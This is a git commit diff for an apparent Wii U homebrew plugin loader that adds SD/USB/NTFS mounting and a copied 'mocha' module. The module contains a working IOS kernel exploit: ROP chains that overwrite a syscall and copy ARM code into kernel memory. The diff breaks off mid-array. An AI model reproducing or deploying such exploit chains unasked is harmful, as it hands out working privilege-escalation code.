[Loader] Added mocha and device mounting.

- Now patching two more function which could be used as hooks (PPCExit and ProcUIProcessMessages)
This commit is contained in:
Maschell 2018-02-14 19:46:14 +01:00
parent 894a60c2bf
commit dc8a9a81fc
17 changed files with 759 additions and 25 deletions

4
.gitmodules vendored Normal file
View File

@ -0,0 +1,4 @@
[submodule "loader/src/mocha"]
path = loader/src/mocha
url = https://github.com/Maschell/mocha
branch = sd_access

View File

@ -36,6 +36,7 @@ BUILD_DBG := $(TARGET)_dbg
SOURCES := src/libelf \ SOURCES := src/libelf \
SOURCES := src/patcher \ SOURCES := src/patcher \
src/common \ src/common \
src/myutils \
src/ src/
DATA := DATA :=
@ -65,7 +66,7 @@ MAKEFLAGS += --no-print-directory
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
# any extra libraries we wish to link with the project # any extra libraries we wish to link with the project
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
LIBS := -lm -lgcc -lutils -ldynamiclibs LIBS := -lm -lgcc -lfat -lntfs -liosuhax -lutils -ldynamiclibs
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
# list of directories containing libraries, this must be the top level containing # list of directories containing libraries, this must be the top level containing
@ -132,14 +133,38 @@ export OUTPUT := $(CURDIR)/$(TARGET)
.PHONY: $(BUILD) clean install .PHONY: $(BUILD) clean install
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
$(BUILD): $(BUILD): $(CURDIR)/src/mocha/ios_kernel/ios_kernel.bin.h
@[ -d $@ ] || mkdir -p $@ @[ -d $@ ] || mkdir -p $@
@$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile @$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
$(CURDIR)/src/mocha/ios_kernel/ios_kernel.bin.h: $(CURDIR)/src/mocha/ios_usb/ios_usb.bin.h $(CURDIR)/src/mocha/ios_mcp/ios_mcp.bin.h $(CURDIR)/src/mocha/ios_fs/ios_fs.bin.h $(CURDIR)/src/mocha/ios_bsp/ios_bsp.bin.h $(CURDIR)/src/mocha/ios_acp/ios_acp.bin.h
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_kernel -f $(CURDIR)/src/mocha/ios_kernel/Makefile
$(CURDIR)/src/mocha/ios_usb/ios_usb.bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_usb -f $(CURDIR)/src/mocha/ios_usb/Makefile
$(CURDIR)/src/mocha/ios_fs/ios_fs.bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_fs -f $(CURDIR)/src/mocha/ios_fs/Makefile
$(CURDIR)/src/mocha/ios_bsp/ios_bsp.bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_bsp -f $(CURDIR)/src/mocha/ios_bsp/Makefile
$(CURDIR)/src/mocha/ios_mcp/ios_mcp.bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_mcp -f $(CURDIR)/src/mocha/ios_mcp/Makefile
$(CURDIR)/src/mocha/ios_acp/ios_acp.bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_acp -f $(CURDIR)/src/mocha/ios_acp/Makefile
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
clean: clean:
@echo clean ... @echo clean ...
@rm -fr $(BUILD) $(OUTPUT).elf $(OUTPUT).bin $(BUILD_DBG).elf @rm -fr $(BUILD) $(OUTPUT).elf $(OUTPUT).bin $(BUILD_DBG).elf
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_kernel -f $(CURDIR)/src/mocha/ios_kernel/Makefile clean
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_usb -f $(CURDIR)/src/mocha/ios_usb/Makefile clean
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_fs -f $(CURDIR)/src/mocha/ios_fs/Makefile clean
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_bsp -f $(CURDIR)/src/mocha/ios_bsp/Makefile clean
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_mcp -f $(CURDIR)/src/mocha/ios_mcp/Makefile clean
@$(MAKE) --no-print-directory -C $(CURDIR)/src/mocha/ios_acp -f $(CURDIR)/src/mocha/ios_acp/Makefile clean
#--------------------------------------------------------------------------------- #---------------------------------------------------------------------------------
else else

View File

@ -19,6 +19,14 @@ extern "C" {
#define ELF_DATA_SIZE (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x04)) #define ELF_DATA_SIZE (*(volatile unsigned int*)(MEM_BASE + 0x1300 + 0x04))
#define MAIN_ENTRY_ADDR (*(volatile unsigned int*)(MEM_BASE + 0x1400 + 0x00)) #define MAIN_ENTRY_ADDR (*(volatile unsigned int*)(MEM_BASE + 0x1400 + 0x00))
#define SDUSB_MOUNTED_NONE 0
#define SDUSB_MOUNTED_FAKE (1<<0)
#define SDUSB_MOUNTED_OS_SD (1<<1)
#define SDUSB_LIBIOSU_LOADED (1<<2)
#define SD_MOUNTED_LIBFAT (1<<3)
#define USB_MOUNTED_LIBFAT (1<<4)
#define USB_MOUNTED_LIBNTFS (1<<5)
#ifndef EXIT_SUCCESS #ifndef EXIT_SUCCESS
#define EXIT_SUCCESS 0 #define EXIT_SUCCESS 0
#endif #endif

View File

@ -1,2 +1,7 @@
#include "retain_vars.h" #include "retain_vars.h"
replacement_data_t gbl_replacement_data __attribute__((section(".data"))); replacement_data_t gbl_replacement_data __attribute__((section(".data")));
u8 gAppStatus __attribute__((section(".data"))) = 0;
volatile u8 gSDInitDone __attribute__((section(".data"))) = 0;
void * ntfs_mounts __attribute__((section(".data"))) = NULL;
int ntfs_mount_count __attribute__((section(".data"))) = 0;

View File

@ -3,6 +3,10 @@
#include "patcher/function_patcher.h" #include "patcher/function_patcher.h"
extern replacement_data_t gbl_replacement_data; extern replacement_data_t gbl_replacement_data;
extern u8 gAppStatus;
extern volatile u8 gSDInitDone;
extern void * ntfs_mounts;
extern int ntfs_mount_count;
#endif // RETAINS_VARS_H_ #endif // RETAINS_VARS_H_

View File

@ -4,6 +4,9 @@
#include <stdarg.h> #include <stdarg.h>
#include <stdio.h> #include <stdio.h>
#include <malloc.h> #include <malloc.h>
#include <sys/types.h>
#include <dirent.h>
#include <dynamic_libs/os_functions.h> #include <dynamic_libs/os_functions.h>
#include <dynamic_libs/socket_functions.h> #include <dynamic_libs/socket_functions.h>
@ -15,16 +18,26 @@
#include <fs/sd_fat_devoptab.h> #include <fs/sd_fat_devoptab.h>
#include <utils/utils.h> #include <utils/utils.h>
#include <system/exception_handler.h> #include <system/exception_handler.h>
#include "common/retain_vars.h" #include "common/retain_vars.h"
#include "common/common.h" #include "common/common.h"
#include "ModuleData.h" #include "ModuleData.h"
#include <wups.h> #include <utils/function_patcher.h>
#include <wups.h>
#include <iosuhax.h>
#include <fat.h>
#include <ntfs.h>
#include "version.h"
#include "main.h" #include "main.h"
#include "utils.h" #include "utils.h"
#include "patcher/function_patcher.h" #include "patcher/function_patcher.h"
#include "patcher/hooks_patcher.h"
#include "myutils/mocha.h"
#include "myutils/libntfs.h"
#include "myutils/libfat.h"
#include "version.h"
static bool loadSamplePlugins(); static bool loadSamplePlugins();
static void ApplyPatches(); static void ApplyPatches();
@ -39,6 +52,10 @@ u8 isFirstBoot __attribute__((section(".data"))) = 1;
/* Entry point */ /* Entry point */
extern "C" int Menu_Main(int argc, char **argv){ extern "C" int Menu_Main(int argc, char **argv){
if(gAppStatus == 2){
//"No, we don't want to patch stuff again.");
return EXIT_RELAUNCH_ON_LOAD;
}
InitOSFunctionPointers(); InitOSFunctionPointers();
InitSocketFunctionPointers(); //For logging InitSocketFunctionPointers(); //For logging
InitSysFunctionPointers(); InitSysFunctionPointers();
@ -50,6 +67,9 @@ extern "C" int Menu_Main(int argc, char **argv){
setup_os_exceptions(); setup_os_exceptions();
DEBUG_FUNCTION_LINE("Mount SD partition\n");
Init_SD_USB();
if(isFirstBoot){ if(isFirstBoot){
memset((void*)&gbl_replacement_data,0,sizeof(gbl_replacement_data)); memset((void*)&gbl_replacement_data,0,sizeof(gbl_replacement_data));
if(!loadSamplePlugins()){ if(!loadSamplePlugins()){
@ -61,6 +81,7 @@ extern "C" int Menu_Main(int argc, char **argv){
if(!isFirstBoot && isInMiiMakerHBL()){ if(!isFirstBoot && isInMiiMakerHBL()){
DEBUG_FUNCTION_LINE("Returing to the Homebrew Launcher!\n"); DEBUG_FUNCTION_LINE("Returing to the Homebrew Launcher!\n");
isFirstBoot = 0; isFirstBoot = 0;
DeInit();
RestorePatches(); RestorePatches();
return EXIT_SUCCESS; return EXIT_SUCCESS;
} else { } else {
@ -83,12 +104,14 @@ extern "C" int Menu_Main(int argc, char **argv){
DEBUG_FUNCTION_LINE("Application is ending now.\n"); DEBUG_FUNCTION_LINE("Application is ending now.\n");
DeInit();
RestorePatches(); RestorePatches();
return EXIT_SUCCESS; return EXIT_SUCCESS;
} }
void ApplyPatches(){ void ApplyPatches(){
PatchInvidualMethodHooks(method_hooks_hooks, method_hooks_size_hooks, method_calls_hooks);
for(int module_index=0;module_index<gbl_replacement_data.number_used_modules;module_index++){ for(int module_index=0;module_index<gbl_replacement_data.number_used_modules;module_index++){
new_PatchInvidualMethodHooks(&gbl_replacement_data.module_data[module_index]); new_PatchInvidualMethodHooks(&gbl_replacement_data.module_data[module_index]);
} }
@ -117,11 +140,16 @@ void CallHook(wups_loader_hook_type_t hook_type){
} }
} }
void DeInit(){
DeInit_SD_USB();
}
void RestorePatches(){ void RestorePatches(){
for(int module_index=gbl_replacement_data.number_used_modules-1;module_index>=0;module_index--){ for(int module_index=gbl_replacement_data.number_used_modules-1;module_index>=0;module_index--){
DEBUG_FUNCTION_LINE("Restoring function for module: %d\n",module_index); DEBUG_FUNCTION_LINE("Restoring function for module: %d\n",module_index);
new_RestoreInvidualInstructions(&gbl_replacement_data.module_data[module_index]); new_RestoreInvidualInstructions(&gbl_replacement_data.module_data[module_index]);
} }
RestoreInvidualInstructions(method_hooks_hooks, method_hooks_size_hooks);
} }
s32 isInMiiMakerHBL(){ s32 isInMiiMakerHBL(){
@ -139,11 +167,8 @@ s32 isInMiiMakerHBL(){
#define PLUGIN_LOCATION_END_ADDRESS 0x01000000 #define PLUGIN_LOCATION_END_ADDRESS 0x01000000
bool loadSamplePlugins(){ bool loadSamplePlugins(){
DEBUG_FUNCTION_LINE("Mount SD partition\n"); if((gSDInitDone & (SDUSB_MOUNTED_OS_SD | SD_MOUNTED_LIBFAT)) > 0){
DEBUG_FUNCTION_LINE("Mounting successful. Loading modules\n");
int res = 0;
if((res = mount_sd_fat("sd")) >= 0){
DEBUG_FUNCTION_LINE("Mounting successful\n");
std::vector<ModuleData *> modules; std::vector<ModuleData *> modules;
@ -177,7 +202,7 @@ bool loadSamplePlugins(){
// TODO: keep it mounted for the plugins. But this would require sharing the read/write/open etc. functions from this loader. // TODO: keep it mounted for the plugins. But this would require sharing the read/write/open etc. functions from this loader.
// Idea: Giving the init hook the pointers. Hiding the __wrap function of the plugin behind the INITIALIZE macro. // Idea: Giving the init hook the pointers. Hiding the __wrap function of the plugin behind the INITIALIZE macro.
// Needs to be tested if this is working. This would have the advantage of adopting all right/accesses from the loader (libfat, libntfs, iosuhax etc.) // Needs to be tested if this is working. This would have the advantage of adopting all right/accesses from the loader (libfat, libntfs, iosuhax etc.)
unmount_sd_fat("sd"); //unmount_sd_fat("sd");
} }
return true; return true;
} }
@ -254,3 +279,81 @@ static void loadElf(std::vector<ModuleData *>* modules, const char * elfPath, ui
DEBUG_FUNCTION_LINE("%s loading failed. \n", elfPath); DEBUG_FUNCTION_LINE("%s loading failed. \n", elfPath);
} }
} }
void Init_SD_USB() {
int res = IOSUHAX_Open(NULL);
if(res < 0){
ExecuteIOSExploitWithDefaultConfig();
}
deleteDevTabsNames();
mount_fake();
gSDInitDone |= SDUSB_MOUNTED_FAKE;
if(res < 0){
DEBUG_FUNCTION_LINE("IOSUHAX_open failed\n");
if((res = mount_sd_fat("sd")) >= 0){
DEBUG_FUNCTION_LINE("mount_sd_fat success\n");
gSDInitDone |= SDUSB_MOUNTED_OS_SD;
}else{
DEBUG_FUNCTION_LINE("mount_sd_fat failed %d\n",res);
}
}else{
DEBUG_FUNCTION_LINE("Using IOSUHAX for SD/USB access\n");
gSDInitDone |= SDUSB_LIBIOSU_LOADED;
int ntfs_mounts = mountAllNTFS();
if(ntfs_mounts > 0){
gSDInitDone |= USB_MOUNTED_LIBNTFS;
}
if(mount_libfatAll() == 0){
gSDInitDone |= SD_MOUNTED_LIBFAT;
gSDInitDone |= USB_MOUNTED_LIBFAT;
}
}
DEBUG_FUNCTION_LINE("%08X\n",gSDInitDone);
}
void DeInit_SD_USB(){
DEBUG_FUNCTION_LINE("Called this function.\n");
if(gSDInitDone & SDUSB_MOUNTED_FAKE){
DEBUG_FUNCTION_LINE("Unmounting fake\n");
unmount_fake();
gSDInitDone &= ~SDUSB_MOUNTED_FAKE;
}
if(gSDInitDone & SDUSB_MOUNTED_OS_SD){
DEBUG_FUNCTION_LINE("Unmounting OS SD\n");
unmount_sd_fat("sd");
gSDInitDone &= ~SDUSB_MOUNTED_OS_SD;
}
if(gSDInitDone & SD_MOUNTED_LIBFAT){
DEBUG_FUNCTION_LINE("Unmounting LIBFAT SD\n");
unmount_libfat("sd");
gSDInitDone &= ~SD_MOUNTED_LIBFAT;
}
if(gSDInitDone & USB_MOUNTED_LIBFAT){
DEBUG_FUNCTION_LINE("Unmounting LIBFAT USB\n");
unmount_libfat("usb");
gSDInitDone &= ~USB_MOUNTED_LIBFAT;
}
if(gSDInitDone & USB_MOUNTED_LIBNTFS){
DEBUG_FUNCTION_LINE("Unmounting LIBNTFS USB\n");
unmountAllNTFS();
gSDInitDone &= ~USB_MOUNTED_LIBNTFS;
}
if(gSDInitDone & SDUSB_LIBIOSU_LOADED){
DEBUG_FUNCTION_LINE("Calling IOSUHAX_Close\n");
IOSUHAX_Close();
gSDInitDone &= ~SDUSB_LIBIOSU_LOADED;
}
deleteDevTabsNames();
if(gSDInitDone != SDUSB_MOUNTED_NONE){
DEBUG_FUNCTION_LINE("WARNING. Some devices are still mounted.\n");
}
DEBUG_FUNCTION_LINE("Function end.\n");
}

View File

@ -31,6 +31,12 @@ extern "C" {
//! C wrapper for our C++ functions //! C wrapper for our C++ functions
int Menu_Main(int argc, char **argv); int Menu_Main(int argc, char **argv);
void Init_SD_USB();
void DeInit_SD_USB();
void DeInit();
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif

1
loader/src/mocha Submodule

@ -0,0 +1 @@
Subproject commit 74f723e2ab5c77e6f79da2816114627a46ee9f2f

View File

@ -0,0 +1,20 @@
#include <utils/logger.h>
#include "libfat.h"
#include <iosuhax.h>
#include <fat.h>
#include "common/retain_vars.h"
int mount_libfatAll(){
int res = -1;
if((res = fatInitDefault()) >= 0){
DEBUG_FUNCTION_LINE("fatInitDefault success\n");
return 0;
}else{
DEBUG_FUNCTION_LINE("fatInitDefault failed %d\n",res);
}
return -1;
}
void unmount_libfat(const char * path){
fatUnmount(path);
}

View File

@ -0,0 +1,15 @@
#ifndef __LIBFAT_MOUNT_H_
#define __LIBFAT_MOUNT_H_
#ifdef __cplusplus
extern "C" {
#endif
int mount_libfatAll();
void unmount_libfat(const char * path);
#ifdef __cplusplus
}
#endif
#endif

View File

@ -0,0 +1,39 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <utils/logger.h>
#include "libntfs.h"
#include <iosuhax.h>
#include <ntfs.h>
#include "common/retain_vars.h"
int mountAllNTFS(){
int i;
// Mount all NTFS volumes on all inserted block devices
ntfs_mount_count = ntfsMountAll((ntfs_md **) &ntfs_mounts, NTFS_DEFAULT | NTFS_RECOVER);
if (ntfs_mount_count == -1){
DEBUG_FUNCTION_LINE("Error whilst mounting devices.\n");
}else if (ntfs_mount_count == 0){
DEBUG_FUNCTION_LINE("No NTFS volumes were found and/or mounted.\n");
}else{
DEBUG_FUNCTION_LINE("%i NTFS volumes(s) mounted!\n", ntfs_mount_count);
}
// List all mounted NTFS volumes
for (i = 0; i < ntfs_mount_count; i++){
DEBUG_FUNCTION_LINE("%i - %s:/ (%s)\n", i + 1, ((ntfs_md *)ntfs_mounts)[i].name, ntfsGetVolumeName(((ntfs_md *)ntfs_mounts)[i].name));
}
return ntfs_mount_count;
}
int unmountAllNTFS(void){
if (ntfs_mounts) {
int i = 0;
for (i = 0; i < ntfs_mount_count; i++){
ntfsUnmount(((ntfs_md *)ntfs_mounts)[i].name, true);
}
free(ntfs_mounts);
ntfs_mounts = NULL;
ntfs_mount_count = 0;
}
return 0;
}

View File

@ -0,0 +1,7 @@
#ifndef __LIBNTFS_MOUNT_H_
#define __LIBNTFS_MOUNT_H_
int mountAllNTFS(void);
int unmountAllNTFS();
#endif

View File

@ -0,0 +1,433 @@
/**
Copy pasted from MOCHA!
https://raw.githubusercontent.com/dimok789/mocha/
**/
#include <string.h>
#include <stdio.h>
#include <dynamic_libs/os_functions.h>
#include <utils/logger.h>
#include "mocha.h"
#define ALIGN4(x) (((x) + 3) & ~3)
#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE (0x120000)
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC
//extern const u8 launch_image_tga[];
//extern const u32 launch_image_tga_size;
static void uhs_exploit_init(int uhs_handle, cfw_config_t * config);
static int uhs_write32(int uhs_handle, int arm_addr, int val);
//!------Variables used in exploit------
static int *pretend_root_hub = (int*)0xF5003ABC;
static int *ayylmao = (int*)0xF4500000;
//!-------------------------------------
typedef struct
{
u32 size;
u8 data[0];
} payload_info_t;
/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */
#include "../mocha/ios_kernel/ios_kernel.bin.h"
#include "../mocha/ios_usb/ios_usb.bin.h"
#include "../mocha/ios_fs/ios_fs.bin.h"
#include "../mocha/ios_bsp/ios_bsp.bin.h"
#include "../mocha/ios_mcp/ios_mcp.bin.h"
#include "../mocha/ios_acp/ios_acp.bin.h"
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const unsigned int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(ios_kernel_bin), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
};
static const int second_chain[] = {
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x00130000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
